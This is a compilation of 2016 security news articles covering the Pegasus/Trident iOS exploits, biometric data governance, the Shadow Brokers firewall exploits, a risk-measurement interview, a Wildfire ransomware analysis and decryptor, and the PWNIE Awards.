The researchers are urging iOS users to apply the patch as soon as possible. Pegasus, according to the security researchers, is highly configurable and is designed to spy on SMS text messages, calls, emails, logs and data from applications like Facebook, Gmail, Skype, WhatsApp and Viber running on iOS devices. “The kit appears to persist even when the device software is updated and can update itself to easily replace exploits if they become obsolete,” the researchers said in their alert. Evidence suggests that Pegasus has been used to conduct so-called ‘lawful intercepts’ of iOS owners by governments and government-backed entities.

The malware kit has been used to spy on a noted human rights activist in the United Arab Emirates, a Mexican journalist who reported on government corruption and potentially several individuals in Kenya, the security researchers said. The malware appears to emphasize stealth very heavily and the authors have gone to considerable efforts to ensure that the source remains hidden. “Certain Pegasus features are only enabled when the device is idle and the screen is off, such as ‘environmental sound recording’ (hot mic) and ‘photo taking’,” the researchers noted.   The spyware also includes a self-destruct mechanism, which can activate automatically when there is a probability that it will be discovered. Like many attacks involving sophisticated malware, the Pegasus attack sequence starts with a phishing text—in this case a link in an SMS message—which when clicked initiates a sequence of actions leading to device compromise and installation of malware. Because of the level of sophistication required to find and exploit iOS zero-day vulnerabilities, exploit chains like Trident can fetch a lot of money in the black and gray markets, the researchers from Citizen Lab and Lookout said.

As an example they pointed to an exploit chain similar to Trident, which sold for $1 million last year. The second report describing vulnerabilities in IOS this week came from researchers at the North Carolina State University, TU Darmstadt, a research university in Germany and University Politehnica in Bucharest. In a paper to be presented at an upcoming security conference in Vienna, the researchers said they focused on iOS’ sandbox feature to see if they could find any security vulnerabilities that could be exploited by third-party applications.

The exercise resulted in the researchers unearthing multiple vulnerabilities that would enable adversaries to launch different kinds of attacks on iOS devices via third-party applications. Among them were attacks that would let someone bypass iOS’ privacy setting for contacts, gain access to a user’s location search history, and prevent access to certain system resources.
In an alert, a researcher who co-authored the paper said that the vulnerabilities have been disclosed to Apple, which is now working on fixing them. Related stories: Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year ...
View Full Bio More Insights

The Hidden Dangers Of 'Bring Your Own Body'

The use of biometric data is on the rise, causing new security risks that must be assessed and addressed. The term “BYOB” might have more interpretations than you think.
Increasingly, in the area of enterprise security and data, it could mean “bring your own body.” The use of biometric data, in both consumer and enterprise technology, is on the rise.

The average worker in a business environment now generates more types of data more quickly than ever, and at higher volumes.
Increasingly, some of that data might be biometric. To understand the sensitive role of biometric data in enterprise information governance, you first have to understand its basic nature -- mainly, that it is very difficult to alter and often inextricable from the individual that it came from. You can easily change your debit card number if it has been stolen, right? But doing the same for your fingerprints or iris is impossible.

Biometric information doesn’t simply provide a code or number permanently assigned to a person, it provides a measure of that person.

Biometric systems provide data on the fundamental physical identity of the self -- a self that has the right to change jobs, move on from an organization, and still have the reasonable expectation that his or her identity and data will remain protected. So, for professionals who work in information governance, this brings up two critical questions: 1. Who, exactly, has ownership of this data? 2. How should the business manage this data? The first, unfortunately, is nearly impossible to answer now. Privacy laws for nonmedical biometric data are still nascent in the US, and determining data ownership between the enterprise and the individual can be difficult and is influenced by many variables. Many businesses harbor some sort of biometric data originating from employees.
So, while the first question may remain unanswered now, it’s clear that data management itself must be considered before biometric data becomes more commonplace.

Failure to think about governance and security practices today could mean beginning too late to prevent a breach or misappropriation tomorrow. There may not be that much biometric data currently in the average enterprise, but its use is on the rise.

Both the private and public sectors probably (and legally) have some of your biometric data right now.
If you’ve ever worked for a government-affiliated organization and achieved any type of security clearance, it has your fingerprint data.
If you have a US driver’s license  -- even if you have no criminal record -- there’s a good chance that the FBI is already analyzing your photo for a facial-recognition database.

The information that HR departments handle on a regular basis -- Social Security numbers, home addresses, health insurance details, tax information, etc. -- all pose threats to privacy and security that are practically incomparable to traditionally stolen data types such as credit card numbers. These hypothetical threats may seem nebulous given today’s relatively low use of biometrics in the average business, but they’re still a concern.
If a regular breach of business documents is a disaster, one with inherently personal data is a legal, monetary, and PR disaster. As of 2016, the average three-year cost of a breach in the US is $4 million over three years, and the average cost of an individual breached business record is $158.

Because most of these breaches until now have been of more traditional data types such as business records, emails, and financial data, the enterprise should expect increasing costs with the availability of increasingly granular data belonging to individuals.

The most-prized data types currently are those that the individual can’t change; medical records have far surpassed credit card numbers in their value on the black market.
It’s not unlikely that personal biometric data -- especially types that are unalterable -- will have similar value. The most logical first step for today’s information governance professionals would be to simply identify what biometric data may exist within the enterprise.

This can include (but isn’t limited to) the following: Fingerprints Iris scans/images Close-up facial photos EEGs (used in neuromarketing research) Fitness tracker and heartrate data Personal handwriting and signatures Once that’s done, mapping the potential locations where that data exists is necessary to determine where the most likely risks exist. Possible places that biometric data reside within the enterprise can include: File-sharing environments Archives and information governance platforms Building entry and physical security systems Third-party password management software Productivity platforms (such as Evernote) Scanned and photographed note repositories Enterprise social media accounts Software-as-a-service products The key objective for the immediate future is to determine what’s within the realm of control, and how security can be strengthened for the locations where there is most likely to be sensitive items.

This relatively simple task today will be important for the future, regardless of how common biometric data becomes in business. So “bring your own body” isn’t quite the HR policy violation it sounds like.
It’s a call to action for information governance and security.
It’s time to identify sources of employee biometric data, and to ensure that it is properly governed and secured within enterprise systems.  Related Content: Kon Leong is CEO/Co-founder of ZL Technologies.

For two decades, he has been immersed in large-scale information technologies to solve "big data" issues for enterprises. His focus for the last 14+ years has been on massively scalable archiving technology to solve records ...
View Full Bio More Insights

Apple Releases Patch For 'Trident,' A Trio Of iOS 0-Days

Already rolled into the Pegasus spyware product and used to target social activists, the vulnerabilities are fixed in iOS 9.3.5. Apple, today, released patches for a trio of iOS zero-day vulnerabilities that, when used together, enable an attacker to remotely, silently jailbreak the device phone and install highly sophisticated spyware upon it.  The vulnerabilities, collectively called "Trident," are patched in iOS version 9.3.5.

They include CVE-2016-4655, Memory Corruption in Webkit, CVE-2016-4656, Information leak in Kernel, and CVE-2016-4657, Kernel Memory corruption leads to Jailbreak.  The discovery was made by Lookout and Citizen Lab, who worked with Apple on the patch before making the disclosure.

Citizen Lab was tipped off to the bugs first by United Arab Emirates-based human rights defender Ahmed Mansoor, who reported that he had received suspicious text messages.

Citizen Lab and Lookout investigated, and found that Mansoor -- who has been targeted by "lawful intercept malware" in the past -- was now being targeted by Francisco Partners Management's Pegasus spyware product, which was now equipped to exploit this trio of undisclosed iOS zero-day vulnerabilities. For more information, see the blog at Lookout. Dark Reading's Quick Hits delivers a brief synopsis and summary of the significance of breaking news events.

For more information from the original source of the news item, please follow the link provided in this article.
View Full Bio More Insights

The Secret Behind the NSA Breach: Network Infrastructure Is the Next...

How the networking industry has fallen way behind in incorporating security measure to prevent exploits to ubiquitous routers, proxies, firewalls and switches. Advanced attackers are targeting organizations’ first line of defense--their firewalls—and turning them into a gateway into the network for mounting a data breach. On August 13, the shady “Shadow Brokers” group published several firewall exploits as proof that they had a full trove of cyber weapons. Whether intended to drive up bids for their “Equation Group Cyber Weapons Auction” (since removed), or to threaten other nation states, the recent disclosure raises the question: if organizations can’t trust their own firewalls, then what can they trust? Does the cache of cyber weapons exposed by Shadow Brokers signal a shift in attack methods and targets? We analyzed the dump and found working exploits for Cisco ASA, Fortinet FortiGate and Juniper SRX (formerly NetScreen) firewalls.

The names of the exploits provided by the Shadow Brokers match the code names described in Edward Snowden’s 2013 revelations of NSA snooping. The exploit names are not the only link to the NSA.

By analyzing the implementation of a cryptographic function, researchers at Kaspersky have found the same encryption constant used in malware attributed to the Equation Group (Kaspersky’s nickname for the NSA) and python code in the latest breach. Cyber Attacks with a Side of EXTRABACONResearching one of the Cisco ASA exploits (dubbed EXTRABACON) in our lab, we found that it’s a simple overflow using SNMP read access to the device.

The additional payload bundled with the exploit removes the password needed for SSH or telnet shell access, providing full control over the appliance.

The payload can also re-enable the original password to reduce the chance that the attacker will be detected. The python code handles multiple device versions and patches the payload for the version at hand.

This indicates the amount of operations the group had in the past as the developers probably modified the exploit on a case-by-case basis. We ran the exploit against a supported version of a Cisco ASA in our lab multiple times and it didn’t crash once, showing the prowess of the exploit developers. Our attempt yielded a shell without password protection: Networking Equipment in the CrosshairsWhile the exploits themselves are interesting in their own right, no one is addressing the elephant in the room: attackers increasingly target network infrastructure, including security as a means to infiltrate networks and maintain persistence. While the entire cybersecurity industry is focused on defending endpoints and servers, attackers have moved on to the next weak spot.

This advancement underscores the need to detect active network attackers because they can certainly—one way or another—penetrate any given network. Persisting and working from routers, proxies, firewalls or switches requires less effort than controlling end points; attackers don’t need to worry that an anti-virus agent will detect an unusual process, and networking devices are rarely updated or replaced. Most networks have the same routers and switches from a decade ago. Plus, few forensics tools are available to detect indicators of compromise on networking devices and attackers can gain an excellent vantage point within the network.  Network devices vendors have fallen behind operating system vendors in terms of implementing stronger security measures.

A wide range of networking equipment still run single-process operating systems without any exploit mitigation enabled (Cisco IOS, I’m looking at you) or exhibit the effects of little to no security quality assurance testing.
In recent years, endpoint and mobile operating systems have incorporated security techniques such as address space layout randomization (ASLR), data execution prevention (DEP), sandboxes, and other methods that made life harder for every exploit writer.

The affected networking devices provide none of these security mechanisms and it shows. Not the First and Definitely Not the LastThe Equation Group breach is not the first example of highly capable attackers targeting network devices.

The threat actor behind last year’s Hacking Team breach leveraged a vulnerability in a VPN device to obtain full access to their internal network without any obstacles.

The attacker moved from the networking device to endpoints without using a single piece of malware, only taking what he needed from endpoints remotely or running well known administrative tools.

This is a soft spot in every endpoint solution’s belly; a privileged attacker using credentials to access files is not considered malicious as long he doesn’t use any malicious software. Notice that as we have stated earlier, the attacker, quoted in pastebin, opted for an embedded exploit and not the other options, stating that it’s the easiest one: So, I had three options: look for a 0day in Joomla, look for a 0day in postfix, or look for a 0day in one of the embedded devices.

A 0day in an embedded device seemed like the easiest option, and after two weeks of work reverse engineering, I got a remote root exploit.
As always, nation state attacks are usually a step ahead of the entire industry on both the defensive and offensive. We will probably see the same methods employed by less sophisticated attackers as it becomes increasingly difficult to compromise endpoint devices and stay undetected. We have seen this happen before; cybercrime attackers stole techniques from Equation Group, as well as Stuxnet and Flame malware and Reign and other APTs and it will surely happen again with the Equation Group’s recently leaked exploits. In the meantime, here are four recommendations to help fortify network devices against attack: Recommendation 1: Patch your network devices promptly. Replace network devices that have reached their end of support date. Recommendation 2: Restrict access to devices management addresses to the minimum required, and block any unneeded, seemingly benign protocols including SNMP and NTP. Recommendation 3: Manage your device passwords as you would with your administrator accounts by periodically changing your passwords and defining a different password for each device.

Do not use a standard template for passwords.

For example, the password Rout3rPassw0rd192.168.1.1 might seem strong, but after compromising one device, the attacker will know all of the passwords. Recommendation 4: Deploy a network monitoring solution that can profile users and IP-connected devices to establish a baseline of normal behavior and then detect unusual activity originating from network devices.

Attackers have no way of knowing what “normal” looks like for any given network and network detection is the only generic way to stop attackers from compromising network devices. Related Content:   Yoni Allon is responsible for leading the LightCyber research team in monitoring and researching cybercriminal and cyberwarfare actions and ensuring that the LightCyber Magna platform accurately finds these behaviors through its detectors and machine learning. Mr.

Allon has ...
View Full Bio More Insights

Security Leadership & The Art Of Decision Making

What a classically-trained guitarist with a Master's Degree in counseling brings to the table as head of cybersecurity and privacy at one of the world's major healthcare organizations. Bishop Fox’s Vincent Liu sat down recently with GE Healthcare Cybersecurity and Privacy General Manager Richard Seiersen in a wide-ranging chat about security decision making, how useful threat intelligence is, critical infrastructure, the Internet of Things, and his new book on measuring cybersecurity risk. We excerpt highlights below. You can read the full text here. Fourth in a series of interviews with cybersecurity experts by cybersecurity experts. Vincent Liu: How has decision making played a part in your role as a security leader? Richard Seiersen:  Most prominently, it’s led me to the realization that we have more data than we think and need less than we think when managing risk.
In fact, you can manage risk with nearly zero empirical data.
In my new book “How to Measure Anything in Cybersecurity Risk,” we call this “sparse data analytics.” I also like to refer to it as “small data.” Sparse analytics are the foundation of our security analytics maturity model. The other end is what we term “prescriptive analytics.” When we assess risk with near zero empirical data, we still have data, which we call “beliefs.” Consider the example of threat modeling. When we threat model an architecture, we are also modeling our beliefs about threats. We can abstract this practice of modeling beliefs to examine a whole portfolio of risk as well. We take what limited empirical data we have and combine it with our subject matter experts’ beliefs to quickly comprehend risk. VL: If you’re starting out as a leader, and you want to be more “decision” or “measurement” oriented, what would be a few first steps down this road? RS: Remove the junk that prevents you from answering key questions. I prefer to circumvent highs, mediums, or lows of any sort, what we call in the book “useless decompositions.” Instead, I try to keep decisions to on-and-off choices. When you have too much variation, risk can be amplified. Most readers have probably heard of threat actor capability.

This can be decomposed into things like nation-state, organized crime, etc. We label these “useless decomposition” when used out of context. Juxtapose these to useful decompositions, which are based on observable evidence.

For example, “Have we or anyone else witnessed this vulnerability being exploited?” More to the point, what is the likelihood of this vulnerability being exploited in a given time frame? If you have zero evidence of exploitability anywhere, your degree of belief would be closer to zero. And when we talk about likelihood, we are really talking about probability. When real math enters the situation, most reactions are, “Where did you get your probability?” My answer is usually something like, “Where do you get your 4 on a 1-to-5 scale, or your ‘high’ on a low, medium, high, critical scale?” A percentage retains our uncertainty.
Scales are placebos that make you feel as if you have measured something when you actually haven’t. This type of risk management based on ordinal scales can be worse than doing nothing.   VL: My takeaway is the more straightforward and simple things are, the better.

The more we can make a decision binary, the better.

Take CVSS (Common Vulnerability Scoring System). You have several numbers that become an aggregate number that winds up devoid of context. RS: The problem with CVSS is it contains so many useless decompositions.

The more we start adding in these ordinal scales, the more we enter this arbitrary gray area. When it comes to things like CVSS and OWASP, the problem also lies with how they do their math. Ordinal scales are not actually numbers. For example, let’s say I am a doctor in a burn unit.
I can return home at night when the average burn intensity is less than 5 on a 1-to-10 ordinal scale.
If I have three patients with burns that each rank a 1, 3, and 10 respectively, my average is less than a 5. Of course, I have one person nearing death, but it’s quitting time and I am out of there! That makes absolutely no sense, but it is exactly how most industry frameworks and vendor implement security risk management.

This is a real problem.

That approach falls flat when you scale out to managing portfolios of risk. VL: How useful is threat intelligence, then? RS: We have to ask—and not to be mystical here—what threat intelligence means.
If you’re telling me it is an early warning system that lets me know a bad guy is trying to steal my shorts, that’s fine.
It allows me to prepare myself and fortify my defenses (e.g., wear a belt) at a relatively sustainable cost. What I fear is that most threat intelligence data is probably very expensive, and oftentimes redundant noise. VL: Where would you focus your energy then? RS: For my money, I would focus on how I design, develop, and deploy products that persist and transmit or manage treasure.

Concentrate on the treasure; the bad guys have their eyes on it, and you should have your eyes directed there, too. This starts in design, and not enough of us who make products focus enough on design. Of course, if you are dealing with the integration of legacy “critical infrastructure”-based technology, you don’t always have the tabula rasa of design from scratch. VL: You mean the integration of critical infrastructure with emerging Internet of Things technology, is that correct? RS: Yes; we need to be thoughtful and incorporate the best design practices here.

Also, due to the realities of legacy infrastructure, we need to consider the “testing in” of security.
Ironically, practices like threat modeling can help us focus our testing efforts when it comes to legacy.
I constantly find myself returning to concepts like the principle of least privilege, removing unnecessary software and services.
In short, focusing on reducing attack surface where it counts most. Oldies, but goodies! VL: When you’re installing an alarm system, you want to ensure it is properly set up before you worry about where you might be attacked. Reduce attack surface, implement secure design, execute secure deployments. Once you’ve finished those fundamentals, then consider the attackers’ origin. RS:  Exactly! As far as the industrial IoT (IIoT) or IoT is concerned, I have been considering the future of risk as it relates to economic drivers...

Connectivity, and hence attack surface, will naturally increase due to a multitude of economic drivers.

That was true even when we lived in analog days before electricity. Now we have more devices, there are more users per device, and there are more application interactions per device per user.

This is an exponential growth in attack surface. VL: And the more attack surface signals more room for breach. RS: As a security professional, I consider what it means to create a device with minimal attack surface but that plays well with others.
I would like to add [that] threat awareness should be more pervasive individually and collectively. Minimal attack surface means less local functionality exposed to the bad guy and possibly less compute on the endpoint as well. Push things that change, and or need regular updates, to the cloud. Plays well with others means making services available for use and consumption; this can include monitoring from a security perspective.

These two goals seem at odds with one another. Necessity then becomes the mother of invention.

There will be a flood of innovation coming from the security marketplace to address the future of breach caused by a massive growth in attack surface.  Richard Seiersen, General Manager of Cybersecurity and Privacy, GE Healthcare PERSONALITY BYTES First career interest: Originally a classical musician who transitioned into teaching music. Start in security: My master’s degree capstone project was focused on decision analysis.
It was through this study that I landed an internship at a company called TriNet, which was then a startup. My internship soon evolved into a risk management role with plenty of development and business intelligence. Best decision-making advice for security leaders: Remove the junk that prevents you from answering key questions. Most unusual academic credential: Earned a Master in Counseling with an emphasis on decision making ages ago.
I focused on a framework that combined deep linguistics analysis with goal-setting to model effective decision making. You could call it “agile counseling” as opposed to open-ended soft counseling. More recently, I started a Master of Science in Predictive Analytics. My former degree has affected how I frame decisions and the latter brings in more math to address uncertainty.

Together they are a powerful duo, particularly when you throw programming into the mix. Number one priority since joining GE: A talent-first approach in building a global team that spans device to cloud security. Bio: Richard Seiersen is a technology executive with nearly 20 years of experience in information security, risk management, and product development.

Currently he is the general manager of cybersecurity and privacy for GE Healthcare. Richard now lives with his family of string players in the San Francisco Bay Area.
In his limited spare time he is slowly working through his MS in predictive analytics at Northwestern. He should be done just in time to retire. He thinks that will be the perfect time to take up classical guitar again. Related Content: Vincent Liu (CISSP) is a Partner at Bishop Fox, a cyber security consulting firm providing services to the Fortune 500, global financial institutions, and high-tech startups.
In this role, he oversees firm management, client matters, and strategy consulting.
Vincent is a ...
View Full Bio More Insights

Wildfire Ransomware Code Cracked – Unlock For Free

Wildfire ransomware has plagued victims in The Netherlands and Belgium Image: McAfee Labs Victims of the Wildfire ransomware can get their encrypted files back without paying hackers for the privilege, after the No More Ransom initiative released a free decryption tool. No More Ransom runs a web portal that provides keys for unlocking files encrypted by various strains of ransomware, including Shade, Coinvault, Rannoh, Rakhn and, most recently, Wildfire. Aimed at helping ransomware victims retrieve their data, No More Ransom is a collaborative project between Europol, the Dutch National Police, Intel Security, and Kaspersky Lab. Wildfire victims are served with a ransom note demanding payment of 1.5 Bitcoins -- the cryptocurrency favored by cybercriminals -- in exchange for unlocking the encrypted files. However, cybersecurity researchers from McAfee Labs, part of Intel Security, point out that the hackers behind Wildfire are open to negotiation, often accepting 0.5 Bitcoins as a payment. Most victims of the ransomware are located in the Netherlands and Belgium, with the malicious software spread through phishing emails aimed at Dutch speakers.

The email claims to be from a transport company and suggests that the target has missed a parcel delivery -- encouraging them to fill in a form to rearrange delivery for another date.
It's this form which drops Wildfire ransomware onto the victim's system and locks it down. A spam email used to infect victims with Wildfire. Image: McAfee Labs Researchers note that those behind Wildfire have "clearly put a lot of effort into making their spam mails look credible and very specific" - even adding the addresses of real businesses in The Netherlands - arousing suspicion that there are Dutch speaking actors involved in the ransomware campaign. Working in partnership with law enforcement agencies, cybersecurity researchers were able to examine Wildfire's control server panel, which showed that in a one month period the ransomware infected 5,309 systems and generated a revenue of 136 Bitcoins (€70,332). Researchers suggest that the malicious code -- which contains instructions not to infect Russian-speaking countries -- means Wildfire operates as part of a ransomware-as-service franchise, with software likely to be leased out by developers in Eastern Europe. Whoever is behind Wildfire, victims no longer need to pay a ransom in order to get their files back,with the decryptor tool now available to download for free from the No More Ransom site.

The tool contains 1,600 keys for Wildfire, and No More Ransom says more will be added in the near future. READ MORE ON CYBERCRIME

Wildfire, the ransomware threat that takes Holland and Belgium hostage

While ransomware is a global threat, every now and then we see a variant that targets one specific region.

For example, the Coinvault malware had many infections in the Netherlands, because the authors posted malicious software on Usenet and Dutch people are particular fond of downloading things over Usenet.

Another example is the recent Shade campaign, which targets mostly Russia and CIS. Today we can add a new one to the list: Wildfire. Infection vector Wildfire spreads through well-crafted spam e-mails.

A typical spam e-mail mentions that a transport company failed to deliver a package.
In order to schedule a new delivery the receiver is asked to make a new appointment, for which a form has to be filled in, which has to be downloaded from the website of the transport company. Three things stand out here.

First, the attackers registered a Dutch domain name, something we do not see very often.
Second, the e-mail is written in flawless Dutch.

And thirdly, they actually put the address of the targeted company in the e-mail.

This is something we do not see very often and makes it for the average user difficult to see that this is not a benign e-mail. However, when we look at who registered the domain name, we immediately see that something is suspicious: The registration date (registered a few days before the spam campaign started), as well as the administrative contact person seem to be very suspicious. The Word document After the user downloaded and opened the Word document, the following screen is shown: Apparently the document has some macros, containing pieces of English text, which clearly show the intent of the attackers (actually it is the lyrics of the famous Pink Floyd song Money), but also has several variables in the Polish language. The ransomware itself The macros download and execute the actual Wildfire ransomware which consists in the case we analyzed of the following three files: Usiyykssl.exe; Ymkwhrrxoeo.png; Iesvxamvenagxehdoj.xml The exe file is an obfuscated .net executable that depends on the other two files.

This is exactly similar to the Zyklon ransomware that also consists of three files.

Another similarity is that, according to some sources (http://www.bleepingcomputer.com/forums/t/611342/zyklon-locker-gnl-help-topic-locked-and-unlock-files-instructionshtml/, http://www.bleepingcomputer.com/forums/t/618641/wildfire-locker-help-topic-how-to-unlock-files-readme-6de99ef7c7-wflx/), Wildfire, GNLocker and Zyklon mainly target the Netherlands.
In addition, the ransom notes of Wildfire and Zyklon look quite similar.

Also note that Wildfire and Zyklon increase the amount you have to pay three-fold if you don’t pay within the specified amount of time. Anyway, back to Wildfire.

The binary is obfuscated, meaning that when there is no deobfuscator available reversing and analyzing it can take a lot of time.

Therefore we decided to run it and see what happens. Just as we hoped, this made things a bit easier, because after a while Usiyykssl.exe launched Regasm.exe, and when we looked into the memory of Regasm.exe, we clearly saw that some malicious code had been injected into it. Dumping it gave us the binary of the actual Wildfire malware. Unfortunately for us, this binary is also obfuscated, this time with Confuserex 0.6.0.

Even though it is possible to deobfuscate binaries obfuscated with Confuserex, we decided to skip that for now. Why? Well it takes a bit of time, and because by working together with the police on this case, we had something much better in our hands: The botnetpanel code! Inside the botnetpanel code When you are infected with Wildfire, the malware calls home to the C2 server where information such as the IP, username, rid and country are stored.

The botnetpanel then checks whether the country is one of the blacklisted countries (Russia, Ukraine, Belarus, Latvia, Estonia and Moldova).
It also checks whether the “rid” exists within a statically defined array (we therefore expect the rid to be an affiliate ID). If the rid is not found, or you live in one of the blacklisted countries, the malware terminates and you won’t get infected. Each time the malware calls home, a new key is generated and added to the existing list of keys.

The same victim can thus have multiple keys.

Finally the botnetpanel returns the bitcoin address to which the victim should pay, and the cryptographic key with which the files on the victim’s computer are encrypted. We don’t quite understand why a victim can have multiple keys, especially since the victim only has one bitcoin address. Also interesting is the encryption scheme.
It uses AES in CBC mode but the key and the IV are both derived from the same key.

This doesn’t add much security and defeats the sole purpose of having an IV in the first place. Conclusion Even though Wildfire is a local threat, it still shows that ransomware is effective and evolving.
In less than a month we observed more than 5700 infections and 236 users paid a total amount of almost 70.000 euro .

This is also due to the fact that the spam e-mails are getting better and better. We therefore advise users to: Be very suspicious when opening e-mails; Don’t enable Word macro’s; Always keep your software up-to-date; Turn on Windows file extensions; Create offline backups (or online backups with unlimited revisions); Turn on the behavioral analyzer of your AV. A decryption tool for Wildfire can be downloaded from the nomoreransom.org website. P.S. the attackers agree with us on some points:

Meet The 2016 PWNIE Award Winners

Contest celebrating the best and worst in information security celebrates its 10th year. 1 of 16 Image Source: PWNIE Awards The PWNIE Awards turned 10 years old this year and perhaps the most surprising thing was that nobody won for Epic Fail for 2016.

Could it be that it was just too hard to top the Office of Personnel Management (OPM) hack of last year?  Hard to say, but the award winners this year range from the best in security research out of the IEEE to the whimsy of the Best Song category. Here's a look at this year’s winners as well as links to their research. Steve Zurier has more than 30 years of journalism and publishing experience, most of the last 24 of which were spent covering networking and security technology.
Steve is based in Columbia, Md.
View Full Bio 1 of 16 More Insights